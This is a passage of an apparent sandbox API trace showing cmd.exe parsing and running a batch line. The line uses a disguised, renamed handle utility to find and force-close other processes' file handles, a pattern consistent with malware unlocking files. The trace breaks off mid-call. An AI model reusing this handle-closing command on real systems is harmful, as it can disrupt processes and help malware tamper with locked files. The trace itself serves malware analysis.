| out: lpDistanceToMoveHigh=0x0) returned 0x4e [0283.482] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc6f634, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xc6f634*=0x94, lpOverlapped=0x0) returned 1 [0283.482] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=148, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`vIDhS3md.exe -accepteula %FN% -nobanner`) DO (vIDhS3md.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0283.482] _get_osfhandle (_FileHandle=3) returned 0xb0 [0283.482] GetFileType (hFile=0xb0) returned 0x1 [0283.482] _get_osfhandle (_FileHandle=3) returned 0xb0 [0283.482] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0283.482] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="\"WinMail.exe.mui\"") returned 0x11 [0283.483] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0283.483] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0283.483] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0283.483] _wcsicmp (_String1="/L", _String2="/F") returned 6 [0283.483] _wcsicmp (_String1="/D", _String2="/F") returned -2 [0283.483] _wcsicmp (_String1="/F", _String2="/F") returned 0 [0283.483] _wcsicmp (_String1="/L", _String2="%I") returned 10 [0283.483] _wcsicmp (_String1="/D", _String2="%I") returned 10 [0283.483] _wcsicmp (_String1="/F", _String2="%I") returned 10 [0283.483] _wcsicmp (_String1="/R", _String2="%I") returned 10 [0283.483] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0283.484] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0283.484] _wcsicmp (_String1="FOR", _String2="vIDhS3md.exe") returned -16 [0283.484] _wcsicmp (_String1="FOR/?", _String2="vIDhS3md.exe") returned -16 [0283.484] _wcsicmp (_String1="IF", _String2="vIDhS3md.exe") returned -13 [0283.484] _wcsicmp (_String1="IF/?", _String2="vIDhS3md.exe") returned -13 [0283.484] _wcsicmp (_String1="REM", _String2="vIDhS3md.exe") returned -4 [0283.484] _wcsicmp (_String1="REM/?", _String2="vIDhS3md.exe") returned -4 [0283.485] _tell (_FileHandle=3) returned 226 [0283.485] _close (_FileHandle=3) returned 0 [0283.485] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xc6f3f8 | out: _Buffer="\r\n") returned 2 [0283.485] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.485] GetFileType (hFile=0x3c) returned 0x2 [0283.485] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.485] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f3d0 | out: lpMode=0xc6f3d0) returned 1 [0283.485] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.485] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xc6f3e8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xc6f3e8*=0x2) returned 1 [0283.485] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0283.485] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0283.485] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xc6f3f4 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0283.486] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xc6f3f4 | out: _Buffer=">") returned 1 [0283.486] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.486] GetFileType (hFile=0x3c) returned 0x2 [0283.486] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.486] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f3d4 | out: lpMode=0xc6f3d4) returned 1 [0283.486] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.486] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xc6f3ec, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xc6f3ec*=0x1e) returned 1 [0283.487] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xc6f694 | out: _Buffer="FOR") returned 3 [0283.487] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.487] GetFileType (hFile=0x3c) returned 0x2 [0283.487] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.487] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f66c | out: lpMode=0xc6f66c) returned 1 [0283.487] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.487] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xc6f684, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xc6f684*=0x3) returned 1 [0283.487] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s", _ArgList=0xc6f694 | out: _Buffer=" /F") returned 3 [0283.487] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.487] GetFileType (hFile=0x3c) returned 0x2 [0283.487] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.487] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f66c | out: lpMode=0xc6f66c) returned 1 [0283.487] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.488] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xc6f684, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xc6f684*=0x3) returned 1 [0283.488] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s", _ArgList=0xc6f694 | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0283.488] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.488] GetFileType (hFile=0x3c) returned 0x2 [0283.488] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.488] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f66c | out: lpMode=0xc6f66c) returned 1 [0283.488] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.488] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0xc6f684, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xc6f684*=0x20) returned 1 [0283.488] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xc6f694 | out: _Buffer=" %I IN ") returned 7 [0283.488] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.488] GetFileType (hFile=0x3c) returned 0x2 [0283.488] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.488] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f66c | out: lpMode=0xc6f66c) returned 1 [0283.489] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.489] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xc6f684, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xc6f684*=0x7) returned 1 [0283.489] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xc6f690 | out: _Buffer="(`vIDhS3md.exe -accepteula \"WinMail.exe.mui\" -nobanner`) DO ") returned 60 [0283.489] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.489] GetFileType (hFile=0x3c) returned 0x2 [0283.489] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.489] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f668 | out: lpMode=0xc6f668) returned 1 [0283.489] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.489] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3c, lpNumberOfCharsWritten=0xc6f680, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xc6f680*=0x3c) returned 1 [0283.489] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.489] GetFileType (hFile=0x3c) returned 0x2 [0283.489] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.489] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f674 | out: lpMode=0xc6f674) returned 1 [0283.490] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.490] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13d2318*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xc6f68c, lpReserved=0x0 | out: lpBuffer=0x13d2318*, lpNumberOfCharsWritten=0xc6f68c*=0x1) returned 1 [0283.490] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.490] GetFileType (hFile=0x3c) returned 0x2 [0283.490] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.490] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f664 | out: lpMode=0xc6f664) returned 1 [0283.490] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.490] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xcbcaa8*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0xc6f67c, lpReserved=0x0 | out: lpBuffer=0xcbcaa8*, lpNumberOfCharsWritten=0xc6f67c*=0xc) returned 1 [0283.491] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xc6f684 | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0283.491] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.491] GetFileType (hFile=0x3c) returned 0x2 [0283.491] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.491] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f65c | out: lpMode=0xc6f65c) returned 1 [0283.491] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.491] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0xc6f674, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xc6f674*=0x26) returned 1 [0283.491] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xc6f694 | out: _Buffer=") ") returned 2 [0283.491] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.491] GetFileType (hFile=0x3c) returned 0x2 [0283.491] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.491] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f66c | out: lpMode=0xc6f66c) returned 1 [0283.492] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.492] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xc6f684, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xc6f684*=0x2) returned 1 [0283.492] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xc6f6a8 | out: _Buffer="\r\n") returned 2 [0283.492] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.492] GetFileType (hFile=0x3c) returned 0x2 [0283.492] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.492] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f680 | out: lpMode=0xc6f680) returned 1 [0283.492] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.492] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xc6f698, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xc6f698*=0x2) returned 1 [0283.493] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0283.493] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0283.493] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0283.493] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0283.493] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0283.493] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0283.493] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0283.493] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0xc6f5d0, _Radix=0 | out: _EndPtr=0xc6f5d0*=",6 delims=: \"") returned 3 [0283.493] wcstol (in: _String="6 delims=: \"", _EndPtr=0xc6f5d0, _Radix=0 | out: _EndPtr=0xc6f5d0*=" delims=: \"") returned 6 [0283.493] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0283.493] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0283.493] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0283.493] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0283.493] _wpopen (_Command="vIDhS3md.exe -accepteula \"WinMail.exe.mui\" -nobanner", _Mode="rb") returned 0x77981268 [0283.530] feof (_File=0x77981268) returned 0 [0283.530] ferror (_File=0x77981268) returned 0 [0283.530] fgets (in: _Buf=0xcbcb10, _MaxCount=256, _File=0x77981268 | out: _Buf="No matching handles found.\r\r\n", _File=0x77981268) returned="No matching handles found.\r\r\n" [0292.295] feof (_File=0x77981268) returned 0 [0292.295] ferror (_File=0x77981268) returned 0 [0292.295] fgets (in: _Buf=0xcba61d, _MaxCount=483, _File=0x77981268 | out: _Buf="", _File=0x77981268) returned 0x0 [0293.376] _pclose (in: _File=0x77981268 | out: _File=0x77981268) returned 0 [0293.378] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xcba61d, cbMultiByte=29, lpWideCharStr=0xcba600, cchWideChar=29 | out: lpWideCharStr="No matching handles found.\r\r\n") returned 29 [0293.378] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xc6f2b0 | out: _Buffer="\r\n") returned 2 [0293.378] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.378] GetFileType (hFile=0x3c) returned 0x2 [0293.378] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0293.378] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f288 | out: lpMode=0xc6f288) returned 1 [0293.504] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.504] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xc6f2a0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xc6f2a0*=0x2) returned 1 [0293.505] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0293.505] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xc6f2ac | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0293.505] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xc6f2ac | out: _Buffer=">") returned 1 [0293.505] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.505] GetFileType (hFile=0x3c) returned 0x2 [0293.505] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0293.505] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f28c | out: lpMode=0xc6f28c) returned 1 [0293.505] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.505] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xc6f2a4, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xc6f2a4*=0x1e) returned 1 [0293.505] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.505] GetFileType (hFile=0x3c) returned 0x2 [0293.505] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0293.506] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f52c | out: lpMode=0xc6f52c) returned 1 [0293.506] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.506] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13d2318*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xc6f544, lpReserved=0x0 | out: lpBuffer=0x13d2318*, lpNumberOfCharsWritten=0xc6f544*=0x1) returned 1 [0293.506] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.506] GetFileType (hFile=0x3c) returned 0x2 [0293.506] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0293.506] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f51c | out: lpMode=0xc6f51c) returned 1 [0293.509] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.509] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xcc8538*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0xc6f534, lpReserved=0x0 | out: lpBuffer=0xcc8538*, lpNumberOfCharsWritten=0xc6f534*=0xc) returned 1 [0293.509] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xc6f53c | out: _Buffer=" -accepteula -c -y -p handles -nobanner ") returned 41 [0293.509] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.509] GetFileType (hFile=0x3c) returned 0x2 [0293.509] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0293.509] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f514 | out: lpMode=0xc6f514) returned 1 [0293.509] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.509] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x29, lpNumberOfCharsWritten=0xc6f52c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xc6f52c*=0x29) returned 1 [0293.510] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xc6f54c | out: _Buffer=") ") returned 2 [0293.510] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.510] GetFileType (hFile=0x3c) returned 0x2 [0293.510] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0293.510] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f524 | out: lpMode=0xc6f524) returned 1 [0293.510] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.510] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xc6f53c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xc6f53c*=0x2) returned 1 [0293.510] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xc6f560 | out: _Buffer="\r\n") returned 2 [0293.510] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.510] GetFileType (hFile=0x3c) returned 0x2 [0293.510] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0293.510] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f538 | out: lpMode=0xc6f538) returned 1 [0293.511] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.511] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xc6f550, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xc6f550*=0x2) returned 1 [0293.511] GetConsoleTitleW (in: lpConsoleTitle=0xc6f078, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0293.511] GetFileAttributesW (lpFileName="vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x20 [0293.511] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0293.511] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0293.511] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0293.511] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0293.511] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0293.511] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0293.511] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0293.511] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0293.511] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0293.511] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0293.511] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0293.511] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0293.512] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0293.513] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0293.513] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0293.513] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0293.513] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0293.513] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0293.513] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0293.513] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0293.513] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0293.513] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0293.513] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0293.513] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0293.513] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0293.513] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0293.513] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0293.513] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0293.513] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0293.513] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0293.513] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0293.513] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0293.513] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0293.513] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0293.513] _wcsicmp (_String1="vIDhS3md.exe", _String2="FOR") returned 16 [0293.513] _wcsicmp (_String1="vIDhS3md.exe", _String2="IF") returned 13 [0293.513] _wcsicmp (_String1="vIDhS3md.exe", _String2="REM") returned 4 [0293.513] _wcsnicmp (_String1="vIDh", _String2="cmd ", _MaxCount=0x4) returned 19 [0293.513] SetErrorMode (uMode=0x0) returned 0x0 [0293.513] SetErrorMode (uMode=0x1) returned 0x0 [0293.513] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xcbf960, lpFilePart=0xc6eb84 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xc6eb84*="Desktop") returned 0x1d [0293.513] SetErrorMode (uMode=0x0) returned 0x1 [0293.513] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: 